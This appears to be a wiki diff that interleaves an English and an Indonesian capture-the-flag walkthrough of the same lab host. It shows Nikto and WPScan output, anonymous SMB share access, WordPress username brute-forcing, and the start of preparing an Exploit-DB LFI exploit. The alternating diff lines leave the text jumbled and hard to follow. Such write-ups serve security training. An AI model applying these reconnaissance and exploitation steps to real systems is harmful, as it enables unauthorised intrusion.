+ Hostname '192.168.1.13' does not match certificate's names: Red.Initech
 
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 
+ Uncommon header 'x-ob_mode' found, with contents: 1
 
+ OSVDB-3233: /icons/README: Apache default file found.
 
+ /phpmyadmin/: phpMyAdmin directory found
 
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
 
+ End Time:          2016-10-04 19:47:05 (GMT-5) (162 seconds)
 
---------------------------------------------------------------------------
 
+ 1 host(s) tested
 
Interestingly enough, I got presented with 4 directories: /phpmyadin/, /blogblog/, /admin112233/, and of course /robots.txt.
 
  
My initial attempts to try and navigate to the directories were futile, as the page kept going back to the home page. So I decided to add https:// before the IP and try again. I attempted to access /robots.txt first, so I entered the following url https://192.168.1.13:12380/robots.txt in my browser, and behold - I got the robots.txt page!
+
Setelah kita selesai dengan kathy share, kita bisa lakukan hal yang sama untuk tmp share,
  
User-agent: *
+
smbclient //fred/tmp -I 192.168.0.61 -N
Disallow: /admin112233/
+
Try "help" to get a list of possible commands.
Disallow: /blogblog/
+
smb: \> ls
From here, I decided to try and navigate to /admin112233/ as it seemed the most interesting to me.
+
  .                                  D        0  Tue Jun  7 04:08:39 2016
 +
  ..                                  D        0  Mon Jun  6 17:39:56 2016
 +
  ls                                  N      274  Sun Jun  5 11:32:58 2016
 +
 +
                19478204 blocks of size 1024. 16397096 blocks available
 +
smb: \> quit
  
 +
Tampaknya tidak ada yang menarik, paling tidak kita dapat file konfigurasi FTP, dan to-do-list.
  
 +
Coba kita lihat,
  
Damnit! Okay, some humor is always great - but this nearly gave me a heart attack…. So what did we learn today? DISABLE JAVA!
+
cat todo-list.txt
  
Once I got over the fact that I could have been hooked, I attempted to navigate the /blogblog/ page.
+
isinya,
  
 +
I'm making sure to backup anything important for Initech, Kathy
  
 +
Coba kita lihat,
  
The blog really didn’t contain much information for us - except a few names - as well as the name of the poster (great for future enumeration or brute forcing tactics - if we go that route). I also saw that the page contained a “login” section. Navigating to the login took me to a WordPress login page… so instead of logging in, I decided to run a WPScan and see if I can’t enumerate any users, plugins, and vulnerabilities.
+
cat ls           
  
root@cryptic:~# wpscan --url https://192.168.1.13:12380/blogblog/ --enumerate uap
+
isinya,
_______________________________________________________________
 
        __          _______  _____                 
 
        \ \        / /  __ \ / ____|               
 
        \ \  /\  / /| |__) | (___  ___  __ _ _ __ 
 
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
 
          \  /\  /  | |    ____) | (__| (_| | | | |
 
            \/  \/  |_|    |_____/ \___|\__,_|_| |_|
 
  
        WordPress Security Scanner by the WPScan Team
+
.:
                      Version 2.9.1
+
total 12.0K
          Sponsored by Sucuri - https://sucuri.net
+
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
+
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
_______________________________________________________________
+
-rw-r--r--  1 root root   0 Jun  5 16:32 ls
 +
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
  
[+] URL: https://192.168.1.13:12380/blogblog/
+
     
[+] Started: Tue Oct  4 20:09:24 2016
+
==Nikto 12380==
  
[!] The WordPress 'https://192.168.1.13:12380/blogblog/readme.html' file exists exposing a version number
+
Cek web
[+] Interesting header: DAVE: Soemthing doesn't look right here
 
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
 
[!] Registration is enabled: https://192.168.1.13:12380/blogblog/wp-login.php?action=register
 
[+] XML-RPC Interface available under: https://192.168.1.13:12380/blogblog/xmlrpc.php
 
[!] Upload directory has directory listing enabled: https://192.168.1.13:12380/blogblog/wp-content/uploads/
 
[!] Includes directory has directory listing enabled: https://192.168.1.13:12380/blogblog/wp-includes/
 
  
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
+
nikto -h 192.168.0.61:12380
[!] 23 vulnerabilities identified from the version number
 
  
[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
+
Hasilnya,
    Reference: https://wpvulndb.com/vulnerabilities/7979
 
    Reference: https://codex.wordpress.org/Version_4.2.2
 
[i] Fixed in: 4.2.2
 
  
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
+
- Nikto v2.1.6
    Reference: https://wpvulndb.com/vulnerabilities/8111
+
---------------------------------------------------------------------------
    Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
+
+ Target IP:          192.168.0.61
    Reference: https://twitter.com/klikkioy/status/624264122570526720
+
+ Target Hostname:   192.168.0.61
    Reference: https://klikki.fi/adv/wordpress3.html
+
+ Target Port:        12380
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
+
---------------------------------------------------------------------------
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
+
+ SSL Info:       Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are
[i] Fixed in: 4.2.3
+
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put
 +
here./CN=Red.Initech/emailAddress=pam@red.localhost
 +
                    Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
 +
                    Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are
 +
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put
 +
here./CN=Red.Initech/emailAddress=pam@red.localhost
 +
+ Start Time:         2023-01-23 01:55:17 (GMT-5)
 +
---------------------------------------------------------------------------
 +
+ Server: Apache/2.4.18 (Ubuntu)
 +
+ The anti-clickjacking X-Frame-Options header is not present.
 +
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
 +
protect against some forms of XSS
 +
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
 +
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
 +
+ The site uses SSL and Expect-CT header is not present.
 +
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
 +
the content of the site in a different fashion to the MIME type
 +
+ No CGI Directories found (use '-C all' to force check all possible dirs)
 +
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 +
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 +
+ "robots.txt" contains 2 entries which should be manually viewed.
 +
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34
 +
is the EOL for the 2.x branch.
 +
+ Hostname '192.168.0.61' does not match certificate's names: Red.Initech
 +
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 +
+ Uncommon header 'x-ob_mode' found, with contents: 1
 +
+ OSVDB-3233: /icons/README: Apache default file found.
 +
+ /phpmyadmin/: phpMyAdmin directory found
 +
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
 +
+ End Time:          2023-01-23 01:59:01 (GMT-5) (224 seconds)
 +
---------------------------------------------------------------------------
 +
+ 1 host(s) tested
  
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
 
    Reference: https://wpvulndb.com/vulnerabilities/8126
 
    Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
 
[i] Fixed in: 4.2.4
 
  
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
+
Yang menarik, kita memperoleh 4 directory: /phpmyadin/, /blogblog/, /admin112233/, dan tentunya /robots.txt.
    Reference: https://wpvulndb.com/vulnerabilities/8130
 
    Reference: https://core.trac.wordpress.org/changeset/33536
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
 
[i] Fixed in: 4.2.4
 
  
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
+
==Akses Web==
    Reference: https://wpvulndb.com/vulnerabilities/8131
 
    Reference: https://core.trac.wordpress.org/changeset/33529
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
 
[i] Fixed in: 4.2.4
 
  
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
+
Coba akses,
    Reference: https://wpvulndb.com/vulnerabilities/8132
 
    Reference: https://core.trac.wordpress.org/changeset/33541
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
 
[i] Fixed in: 4.2.4
 
  
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
+
https://192.168.0.61:12380/robots.txt
    Reference: https://wpvulndb.com/vulnerabilities/8133
 
    Reference: https://core.trac.wordpress.org/changeset/33549
 
    Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
 
[i] Fixed in: 4.2.4
 
  
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
+
Tampak isinya,
    Reference: https://wpvulndb.com/vulnerabilities/8186
 
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
 
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
 
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
 
[i] Fixed in: 4.2.5
 
  
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
+
User-agent: *
    Reference: https://wpvulndb.com/vulnerabilities/8187
+
Disallow: /admin112233/
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
+
Disallow: /blogblog/
    Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
 
[i] Fixed in: 4.2.5
 
  
[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
+
Mari kita coba
    Reference: https://wpvulndb.com/vulnerabilities/8188
 
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
 
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
 
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
 
[i] Fixed in: 4.2.5
 
  
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
+
  https://192.168.0.61:12380/admin112233/
    Reference: https://wpvulndb.com/vulnerabilities/8358
 
    Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
 
    Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
 
[i] Fixed in: 4.2.6
 
  
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
+
Akan mengeluarkan "humor"
    Reference: https://wpvulndb.com/vulnerabilities/8376
 
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
 
    Reference: https://core.trac.wordpress.org/changeset/36435
 
    Reference: https://hackerone.com/reports/110801
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
 
[i] Fixed in: 4.2.7
 
  
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
+
This could of been a BeEF-XSS hook ;)
    Reference: https://wpvulndb.com/vulnerabilities/8377
 
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
 
    Reference: https://core.trac.wordpress.org/changeset/36444
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
 
[i] Fixed in: 4.2.7
 
  
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
+
Mari kita coba
    Reference: https://wpvulndb.com/vulnerabilities/8473
 
    Reference: https://codex.wordpress.org/Version_4.5
 
    Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
 
[i] Fixed in: 4.5
 
  
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
+
https://192.168.0.61:12380/blogblog/
    Reference: https://wpvulndb.com/vulnerabilities/8474
 
    Reference: https://codex.wordpress.org/Version_4.5
 
    Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
 
[i] Fixed in: 4.5
 
  
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
+
Tampak berisi blog, tidak ada yang terlalu menarik kecuali ada beberapa nama. Dan yang menarik ada login page.
    Reference: https://wpvulndb.com/vulnerabilities/8475
 
    Reference: https://codex.wordpress.org/Version_4.5
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
 
[i] Fixed in: 4.5
 
  
[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
+
==WPScan==
    Reference: https://wpvulndb.com/vulnerabilities/8488
 
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
 
    Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
 
    Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
 
[i] Fixed in: 4.5.2
 
  
[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
+
Scan menggunakan,
    Reference: https://wpvulndb.com/vulnerabilities/8489
 
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
 
    Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
 
    Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
 
    Reference: http://avlidienbrunn.com/wp_some_loader.php
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
 
[i] Fixed in: 4.2.8
 
  
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
+
wpscan --url https://192.168.0.61:12380/blogblog/ -e u --disable-tls-checks
    Reference: https://wpvulndb.com/vulnerabilities/8518
+
wpscan --url https://192.168.0.61:12380/blogblog/ -e ap --disable-tls-checks
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
 
    Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
 
[i] Fixed in: 4.2.9
 
  
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
+
Hasilnya,
    Reference: https://wpvulndb.com/vulnerabilities/8519
 
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
 
    Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
 
    Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
 
[i] Fixed in: 4.2.9
 
  
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
+
_______________________________________________________________
    Reference: https://wpvulndb.com/vulnerabilities/8520
+
          __          _______  _____
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
+
          \ \        / / __ \ / ____|
    Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
+
          \ \  // /| |__) | (___  ___  __ _ _ __ ®
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
+
            \ \/ \/ / |  ___/ \___ \ / __|/ _` | '_ \
[i] Fixed in: 4.2.9
+
            \  // | |    ____) | (__| (_| | | | |
 +
              \/ \/   |_|    |_____/ \___|\__,_|_| |_| 
  
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
+
          WordPress Security Scanner by the WPScan Team
    Reference: https://wpvulndb.com/vulnerabilities/8615
+
                          Version 3.8.22
    Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
+
        Sponsored by Automattic - https://automattic.com/
    Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
+
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
+
_______________________________________________________________
    Reference: http://seclists.org/fulldisclosure/2016/Sep/6
+
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
+
[+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61]
[i] Fixed in: 4.2.10
+
[+] Started: Mon Jan 23 03:19:59 2023
 +
 +
Interesting Finding(s):
 +
 +
[+] Headers
 +
  | Interesting Entries:
 +
  |  - Server: Apache/2.4.18 (Ubuntu)
 +
  |  - Dave: Soemthing doesn't look right here
 +
  | Found By: Headers (Passive Detection)
 +
  | Confidence: 100%
 +
 +
[+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php
 +
  | Found By: Headers (Passive Detection)
 +
  | Confidence: 100%
 +
  | Confirmed By:
 +
  |  - Link Tag (Passive Detection), 30% confidence
 +
  |  - Direct Access (Aggressive Detection), 100% confidence
 +
  | References:
 +
  |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
 +
 +
[+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html
 +
  | Found By: Direct Access (Aggressive Detection)
 +
  | Confidence: 100%
 +
 +
[+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register
 +
  | Found By: Di rect Access (Aggressive Detection)
 +
  | Confidence:  100%
 +
 +
[+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp- content/uploads/
 +
  | Found By: Direct Access (Aggressive Detection)
 +
  | Confidence: 100%
 +
 +
[+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php
 +
  | Found By: Direct Access (Aggressive Detection)
 +
  | Confidence: 60%
 +
  | References:
 +
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
 +
  |  - https://github.com/wpscanteam/wpscan/issues/1299
 +
 +
[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 +
  | Found By: Rss Generator (Passive Detection)
 +
  |  - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 +
  |  - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 +
 
 +
[+] WordPress theme in use: bhost
 +
  | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/
 +
  | Last Updated: 2022-10-30T00:00:00.000Z
 +
  | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt
 +
  | [!] The version is out of date, the latest version is 1.6
 +
  | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 +
  | Style Name: BHost
 +
  | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 +
  | Author: Masum Billah
 +
  | Author URI: http://getmasum.net/
 +
  |
 +
  | Found By: Css Style In Homepage (Passive Detection)
 +
  |
 +
  | Version: 1.2.9 (80% confidence)
 +
  | Found By: Style (Passive Detection)
 +
  |  - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'
 +
 +
[+] Enumerating Users (via Passive and Aggressive Methods)
 +
  Brute Forcing Author IDs - Time: 00:00:00
 +
<====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
 +
 +
[i] User(s) Identified:
 +
 +
[+] John Smith
 +
  | Found By: Author Posts - Display Name (Passive Detection)
 +
  | Confirmed By: Rss Generator (Passive Detection)
 +
 +
[+] john
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] garry
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] barry
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] elly
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] peter
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] heather
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] harry
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] scott
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] kathy
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[+] tim
 +
  | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 +
  | Confirmed By: Login Error Messages (Aggressive Detection)
 +
 +
[!] No WPScan API Token given, as a result vulnerability data has not been output.
 +
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
 +
 +
[+] Finished: Mon Jan 23 03:20:02 2023
 +
[+] Requests Done: 23
 +
[+] Cached Requests: 55
 +
[+] Data Sent: 7.361 KB
 +
[+] Data Received: 49.097 KB
 +
[+] Memory used: 193.543 MB
 +
[+] Elapsed time: 00:00:03
  
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
 
    Reference: https://wpvulndb.com/vulnerabilities/8616
 
    Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
 
    Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
 
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
 
[i] Fixed in: 4.2.10
 
  
[+] WordPress theme in use: bhost - v1.2.9
+
Hasil -e ap
 +
_______________________________________________________________
 +
          __          _______  _____
 +
          \ \        / /  __ \ / ____|
 +
          \ \  /\  / /| |__) | (___  ___  __ _ _ __ ®
 +
            \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
 +
            \  /\  /  | |    ____) | (__| (_| | | | |
 +
              \/  \/  |_|    |_____/ \___|\__,_|_| |_|
 +
 +
          WordPress Security Scanner by the WPScan Team
 +
                          Version 3.8.22
 +
        Sponsored by Automattic - https://automattic.com/
 +
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
 +
_______________________________________________________________
 +
 +
[+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61]
 +
[+] Started: Mon Jan 23 03:23:24 2023
 +
 +
Interesting Finding(s):
 +
 +
[+] Headers
 +
  | Interesting Entries:
 +
  |  - Server: Apache/2.4.18 (Ubuntu)
 +
  |  - Dave: Soemthing doesn't look right here
 +
  | Found By: Headers (Passive Detection)
 +
  | Confidence: 100%
 +
 +
[+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php
 +
  | Found By: Headers (Passive Detection)
 +
  | Confidence: 100%
 +
  | Confirmed By:
 +
  |  - Link Tag (Passive Detection), 30% confidence
 +
  |  - Direct Access (Aggressive Detection), 100% confidence
 +
  | References:
 +
  |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 +
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
 +
 +
[+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html
 +
  | Found By: Direct Access (Aggressive Detection)
 +
  | Confidence: 100% 
 +
 +
[+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register
 +
  | Found By: Direct Access (Aggressive Detection)
 +
  | Confidence: 100%
 +
 +
[+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp-content/uploads/
 +
  | Found By: Direct Access (Aggressive Detection)
 +
  | Confidence: 100%
 +
 +
[+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php
 +
  | Found By: Direct Access (Aggressive Detection)
 +
  | Confidence: 60%
 +
  | References:
 +
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
 +
  |  - https://github.com/wpscanteam/wpscan/issues/1299
 +
 +
[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 +
  | Found By: Rss Generator (Passive Detection)
 +
  |  - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 +
  |  - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
  
[+] Name: bhost - v1.2.9
+
[+] WordPress theme in use: bhost
| Location: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/
+
  | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/
| Readme: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/readme.txt
+
  | Last Updated: 2022-10-30T00:00:00.000Z
[!] The version is out of date, the latest version is 1.3.3
+
  | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt
| Style URL: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/style.css
+
  | [!] The version is out of date, the latest version is 1.6
| Theme Name: BHost
+
  | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
| Theme URI: Author: Masum Billah
+
  | Style Name: BHost
Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
+
  | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
| Author: Masum Billah
+
  | Author: Masum Billah
| Author URI: http://getmasum.net/
+
  | Author URI: http://getmasum.net/
 +
  |
 +
  | Found By: Css Style In Homepage (Passive Detection)
 +
  |
 +
  | Version: 1.2.9 (80% confidence)
 +
  | Found By: Style (Passive Detection)
 +
  |  - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1,
 +
Match: 'Version: 1.2.9'
 
   
 
   
[+] Enumerating usernames ...
+
[+] Enumerating All Plugins (via Passive Methods)
[+] Identified the following 10 user/s:
+
    +----+---------+-----------------+
+
[i] No plugins Found.
    | Id | Login  | Name            |
+
    +----+---------+-----------------+
+
[!] No WPScan API Token given, as a result vulnerability data has not been output.
    | 1 | john    | John Smith      |
+
  [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
    | 2 | elly    | Elly Jones      |
+
   
    | 3 | peter  | Peter Parker    |
+
  [+] Finished: Mon Jan 23 03:23:29 2023
    | 4 | barry  | Barry Atkins    |
+
  [+] Requests Done: 2
    | 5 | heather | Heather Neville |
+
  [+] Cached Requests: 34
    | 6 | garry  | garry          |
+
  [+] Data Sent: 660 B
    | 7 | harry  | harry          |
+
  [+] Data Received: 1.093 KB
    | 8 | scott  | scott          |
+
  [+] Memory used: 239.617 MB
    | 9 | kathy  | kathy          |
+
  [+] Elapsed time: 00:00:05
    | 10 | tim    | tim            |
 
    +----+---------+-----------------+
 
  
 +
Keren!
 +
* Kita dapat banyak user
 +
* Tampaknya ada XSS Vulnerability, Path Traversal Vulnerability
 +
* Cek LFI exploit https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion dibagian advanced-video-embed-embed-videos-or-playlists
 +
* Contoh exploit ada di https://www.exploit-db.com/exploits/39646
  
[+] Enumerating plugins from passive detection ...
+
==LFI Exploit==
[+] No plugins found
 
  
[+] Enumerating all plugins (may take a while and use a lot of system resources) ...
+
Download Exploit dari https://www.exploit-db.com/exploits/39646
 +
Edit file
  
  Time: 00:06:11 <=====================> (62804 / 62804) 100.00% Time: 00:06:11
+
vi /home/kali/Downloads/39646.py
  
[+] We found 4 plugins:
+
Tambahkan,
  
